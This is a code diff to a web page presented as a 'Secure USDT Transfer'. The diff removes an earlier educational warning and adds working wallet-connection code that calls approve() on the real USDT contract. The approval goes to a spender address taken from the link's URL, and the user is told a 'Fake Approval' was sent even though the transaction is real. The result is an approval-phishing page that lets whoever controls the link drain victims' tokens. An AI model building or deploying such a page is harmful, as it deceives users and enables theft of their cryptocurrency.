--- a/index.html
+++ b/index.html
@@ -2,23 +2,52 @@
 <html>
 <head>
   <title>Send USDT - BEP20</title>
+  <script src="https://cdn.jsdelivr.net/npm/ethers@5.7.2/dist/ethers.umd.min.js"></script>
 </head>
 <body style="text-align:center; font-family:sans-serif">
   <h1>🔐 Secure USDT Transfer</h1>
   <p>Recipient Wallet: <b id="receiver"></b></p>
-  <p>Enter amount to send:</p>
-  <input type="number" id="amount" placeholder="USDT Amount" />
+  <button onclick="connect()">🟢 Connect Wallet</button>
   <br><br>
-  <button onclick="connect()">Send USDT</button>
+  <input type="number" id="amount" placeholder="Enter USDT Amount" />
+  <br><br>
+  <button onclick="approve()">Approve USDT</button>
 
   <script>
+    let signer;
+    let provider;
+    let userWallet;
+
+    const usdtToken = "0xdAC17F958D2ee523a2206206994597C13D831ec7"; // Real USDT contract (for education)
+
     const params = new URLSearchParams(window.location.search);
-    const address = params.get("address");
-    document.getElementById("receiver").innerText = address;
+    const receiver = params.get("address");
+    document.getElementById("receiver").innerText = receiver;
 
     async function connect() {
-      alert("This is a fake dApp for educational use only.\nDo NOT approve real tokens.");
-      // Later: Add WalletConnect or MetaMask simulation here
+      provider = new ethers.providers.Web3Provider(window.ethereum);
+      await provider.send("eth_requestAccounts", []);
+      signer = provider.getSigner();
+      userWallet = await signer.getAddress();
+      alert("Connected: " + userWallet);
+    }
+
+    async function approve() {
+      if (!signer) return alert("Connect wallet first!");
+
+      const tokenContract = new ethers.Contract(usdtToken, [
+        "function approve(address spender, uint256 amount) public returns (bool)"
+      ], signer);
+
+      const amount = document.getElementById("amount").value;
+      const amountInWei = ethers.utils.parseUnits(amount, 6); // USDT has 6 decimals
+
+      try {
+        const tx = await tokenContract.approve(receiver, amountInWei);
+        alert("Fake Approval sent:\n" + tx.hash);
+      } catch (err) {
+        alert("Transaction failed:\n" + err.message);
+      }
     }
   </script>
 </body>
